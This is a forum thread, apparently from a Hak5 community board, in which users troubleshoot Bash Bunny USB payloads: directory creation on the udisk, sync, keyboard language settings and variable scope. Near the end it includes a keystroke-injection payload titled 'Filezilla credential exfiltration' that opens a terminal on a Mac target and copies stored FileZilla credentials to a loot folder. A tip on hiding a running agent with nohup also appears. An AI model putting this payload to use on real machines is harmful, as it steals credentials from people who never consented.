Payload and unix command

quentin.lamamy

Hi there,

I have a little question. I love my Bash Bunny and have created a lot of payloads (I will post them when they are really finished), but I still have some questions.

Currently, for all my payloads I open a terminal, minimize it and do my stuff. When I look at this kind of payload, on line 24 there is a Unix command, "mkdir". So is it possible to use Unix commands without a terminal?

Reminder for people who read this topic, Unix commands that work in a payload:

mkdir
source
export

 

Edited by quentin.lamamy

1 hour ago, quentin.lamamy said:

Is there a list somewhere? I can't find this information on the wiki.

That's because it's not on the Wiki. Think about it - the Bash Bunny is a Linux computer in a USB, therefore it uses bash/sh, meaning any bash/sh commands will work (well, most of them, at least). Therefore just Google stuff like this.


Thanks for the tutorial... and the respect... I'm not aware of the internal software and hardware of the BB.

Just telling me that the BB is a Linux computer in a USB key is enough; I don't need help to know the command list available on Unix, and I don't need your disdain.


56 minutes ago, quentin.lamamy said:


I wasn't disrespecting you, sorry if it seemed that way.

You asked for a command list after I stated that the BB was a Linux box on a stick, so I just helped point you in the right direction - Google a list of commands. :)

Hope it helped in the end. While I said that you can find a list of commands, I also said that some may not work (most will work), so the best way to find out is to test them. Obviously don't do commands that may brick your Bunny or break something.

 

Edited by Dave-ee Jones

Ok, hoist the white flag xD

I just tried this command

mkdir -p /root/udisk/loot/exfiltration

nothing, no folder, a total void ^^

but if I use this command

Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration
Q ENTER

it works \o/

For me it's the same; I just want to understand where my mistake is.

Thanks

Edited by quentin.lamamy

Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..?

In regards to your first try, "/root/udisk" doesn't actually refer to your USB storage while in Arming mode. However, if you decided to write a payload that did this:

LED Y # Make LED yellow to start
mkdir -p "/root/udisk/loot/exfiltration" # Makes the directory
if [ -d "/root/udisk/loot/exfiltration" ] # Checks for the directory
then
 LED G # If the directory exists turn the LED green
fi

And then went back into Arming mode, you will notice the folder is there. Also, the LED should have gone green during the payload too.

Also, your code did work; however, you just can't see the directory in the USB storage. If you check for that directory (or even 'cd' to it) in the serial console where you called it you will notice it actually does exist. It's a bit weird how it works - you just have to think of USB storage and 'udisk' as 2 different things.

You can use the "udisk mount" and "sync" commands to sync the 'udisk' and USB storage.

 

EDIT: I did the same thing you did (created the directory in the serial console), then rebooted my Bunny and the folder was there in USB storage. I would say you need to sync it before you try and access it on USB storage.

Edited by Dave-ee Jones

20 minutes ago, Dave-ee Jones said:


It's just in my switch1 folder like any other payload (not in the serial console). And I tested this weird path because I saw it in this payload (when I don't have enough documentation or data, I try to learn from the existing scripts). But it seems that it's not the right way to create a folder (before moving files inside during exfiltration).

Edited by quentin.lamamy

1 minute ago, quentin.lamamy said:


Aha, that's how everyone learns :P

But did it work for you? You may have to play around a bit for it to update live in Windows Explorer, but using it in a payload works fine. E.g. I can create a folder using "mkdir -p" and put/get files from it as I need, it just doesn't show the folder in Windows Explorer initially - you would have to sync it and "udisk mount" (don't quote me on the mounting part - I'm not actually sure how that works, I did once upon a time when I needed to use it for a payload but now I've forgotten).


I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there.

Summary. The BB is an ARM machine running Linux. It has its root partition that it boots from and a NAND (I think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can SSH into it and explore it.

The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are run from. For the payloads themselves there are helper functions to get the IP address of the Bunny and clients, switch position, and hostnames. The wiki has their uses.

I looked in the past for a way to run my payloads hidden in Linux and found a way, but it works best when the payload is encompassed into a script, i.e. Python, Perl, bash, whatever.

The key here is the nohup command in Linux. I do not know if it is there in MacOS but I have always seen it in Linux. If I use it like so against my payload script it will be:

nohup bash ./myscript.sh &
exit

nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.out file.

I have found that while prethinking of a way to make an agent run hidden on Linux since I had no takers on writing the Python agent for the BBTPS for Linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from Python detached from the current Python instance (like Start-Process in PowerShell for Windows).


6 hours ago, PoSHMagiC0de said:
That doesn't sound like it has anything to do with this guy's question.


Here is the result of some tests

TEST 1: Print the command in the shell and press Enter

rootDir=/Volumes/BashBunny
lootDir=$rootDir/loot/exfiltration/

[...]

Q STRING mkdir -p $lootDir
Q ENTER

The result: no folder creation, and this output in the console

bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/
mkdir: §p: File exists

Why this error? I don't know, because the file doesn't exist.

And why does my mkdir -p become mkdir §p?

 


Okay, your keyboard language and Bunny language need to be the same. So whatever you use (us, fr, etc.) needs to be set on both systems. Using the command:

DUCKY_LANG us

should fix the Bunny up. Just set the Bunny's language to whatever the PC's language is. There's a list of supported languages in the 'language' folder on the Bunny's USB storage.

Now, in regards to the "folder exists" error, it means the folder exists ( :P ). The USB storage may not show it, but on the Bunny it exists. Why are you using Ducky script to write the command? What are you writing the command into? Did you try my quick payload to see if it is working?

18 hours ago, Dave-ee Jones said:

LED Y # Make LED yellow to start
mkdir -p "/root/udisk/loot/exfiltration" # Makes the directory
if [ -d "/root/udisk/loot/exfiltration" ] # Checks for the directory
then
 LED G # If the directory exists turn the LED green
fi

 

 

Edited by Dave-ee Jones

You can see all the files on USB storage when you do this in the serial console:

udisk mount # unlocks USB storage in console
cd /root/udisk/ # go to the USB storage
ls # lists all the files/folders in the current directory

Just tested that, works good. From there you can "mkdir" and stuff, then call "sync" at the end and everything updates fine, after you've rebooted.

You may also notice that everything works fine in a normal payload, you wouldn't normally have to do a udisk mount and a sync every time. You can write to a file in the loot directory and once the payload has completed, just call "sync" and once the payload has finished go back to arming mode and your exfiltration stuff is sitting right there.

Edited by Dave-ee Jones
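An added example (not from this thread or from Hak5) of the approach described above: the Bunny's own shell creates the loot directory under /root/udisk, checks it, writes a loot file and calls sync, instead of typing "mkdir" into the target with Q STRING. LED is a Bunny payload-framework command and is stubbed when absent; the udisk path and the loot/exfiltration subdirectory are taken from the posts above, and the root can be overridden to run it on any Linux host.

```shell
#!/bin/bash
# Added example: create the loot directory on the Bunny itself from a payload.
# Unlike "Q STRING mkdir -p ...", which types the command into whatever window
# the target has focused, these lines are executed by the Bunny's own shell.

# LED is provided by the Bunny payload framework; stand in for it elsewhere.
if ! command -v LED >/dev/null 2>&1; then
  LED() { echo "LED $*"; }
fi

# prepare_loot_dir UDISK_ROOT SUBDIR
# Creates <UDISK_ROOT>/loot/<SUBDIR>, verifies it exists, prints the full path.
prepare_loot_dir() {
  loot_dir="$1/loot/$2"
  mkdir -p "$loot_dir" || return 1
  [ -d "$loot_dir" ] || return 1
  printf '%s\n' "$loot_dir"
}

# store_loot LOOT_DIR NAME CONTENT
# Writes one loot file, then flushes it so it shows up as USB storage after
# the switch back to arming mode (the "sync" step from the posts above).
store_loot() {
  printf '%s\n' "$3" > "$1/$2" || return 1
  sync
  [ -s "$1/$2" ]
}

# Payload-style flow: yellow while working, green on success, red on failure.
# /root/udisk is the Bunny's udisk mount point; pass another root to test
# on a different machine.
run_payload() {
  LED Y
  dir=$(prepare_loot_dir "${1:-/root/udisk}" exfiltration) || { LED R; return 1; }
  store_loot "$dir" marker.txt "payload ran at $(date)" || { LED R; return 1; }
  LED G
}

# Only run automatically when asked, so sourcing this file for its functions
# (or loading it on a non-Bunny host) has no side effects.
if [ -n "${RUN_PAYLOAD:-}" ]; then
  run_payload "$@"
fi
```

Run it as the payload body with RUN_PAYLOAD=1, or source it and call run_payload with a scratch directory to see the same mkdir, check and sync sequence outside the Bunny.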

Just tried and yes, tadaa, I have my folder, but in my case it doesn't work?

#!/bin/bash
###############################################################################
#           _____  _____  _____  _____     _____  _____  _____  _____  __ __  #
# (\___/)  | __  ||  _  ||   __||  |  |   | __  ||  |  ||   | ||   | ||  |  | #
# (='.'=)  | __ -||     ||__   ||     |   | __ -||  |  || | | || | | ||_   _| #
# (")_(")  |_____||__|__||_____||__|__|   |_____||_____||_|___||_|___|  |_|   #  
#                           Bash Bunny by Hak5 USB Attack/Automation Platform #
#                                                                             #
###############################################################################
#                                                                             #
# Title:         Filezilla credential exfiltration                            #
# Author:        Quentin Lamamy <contact@quentin-lamamy.fr>                   #
# Description    Exfiltrate filezilla credential                              #
# Version:       1.0                                                          #
# Platform       OSX                                                          #
#                                                                             #
###############################################################################


#####################
# Setup the payload #
#####################

LED SETUP
rootDir=/Volumes/BashBunny
lootDir=$rootDir/loot/exfiltration/filezilla
DUCKY_LANG fr
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

#####################
# Attack the target #
#####################

LED ATTACK

Q CTRL SPACE
Q STRING terminal
Q ENTER

Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh
Q ENTER

Q STRING shell.init
Q ENTER

Q STRING mkdir -p $lootDir
Q ENTER

Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh;
Q ENTER

Q STRING filezilla.exfiltration $lootDir
Q ENTER

#Q STRING clear
#Q ENTER

QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh
QUACK ENTER

# Close terminal
#QUACK STRING killall Terminal
#QUACK ENTER

LED FINISH
#################################################################################
# (\___/)      Find further documentation, repository of payloads,      (\___/) #
# (='.'=)      tutorial videos and community support forums at          (='.'=) #
# (")_(")      bashbunny.com. (C) Hak5 LLC                              (")_(") #
#################################################################################
cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directory

 

It's not the best way to do QUACK mkdir ... and QUACK ENTER, but it should work, no?

Edited by quentin.lamamy

I don't understand why you are Ducky scripting your "mkdir", you don't need to. The Bash Bunny is a Linux box, therefore saying 

mkdir -p $lootDir 

says "Make a directory in this folder called this: 'exfiltration'".

However, doing it like you are doing it

Q STRING mkdir -p $lootDir

is just writing that in a selected textbox. So unless the selected textbox is a SSH/Serial console in the Bunny this isn't going to work.

So it is in a Terminal, therefore this COULD work; however, you must remember that any command you make is being executed on your PC, not the Bunny. I don't have a Mac so I can't test this or see anything that may be wrong with your Terminal stuff.

Nowhere does it show Quentin_Sitemanager.xml being created so I am assuming that is in one of your *.sh files? You should look at those. Also, check to make sure that filezillaExfiltration.sh is actually being run - sourcing it might run it and then calling it might run it again. The second time you've called it it might not run correctly because it has to be executable. You should make the *.sh files log to another file, giving you regular updates of what is happening.

Edited by Dave-ee Jones

21 hours ago, Dave-ee Jones said:

Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P

Yes, all these classic commands will work; I try all the "uncommon" commands to help the future BB noobs like me.

Next Unix command test: export

export FOO="BAR"
Q STRING $FOO

# Will print, as expected, BAR in the current focused window

export PS1="bashbunny>"

# Will do nothing

I have little idea why it doesn't change my terminal prompt; it may be a kind of scope issue. Something like the var is set for the currently running script on the BB and not for the currently opened terminal.

I used to succeed in making this work with Q STRING and Q ENTER, but now it breaks with some encoding issue

# Print this command in the terminal in order to be in the "good scope"
Q STRING "export PS1='bashbunny >'"
Q ENTER

but the unexpected result is

export PS1-'bashbunny #'

Encoding problem solved with a new OSX keyboard layout

Edited by quentin.lamamy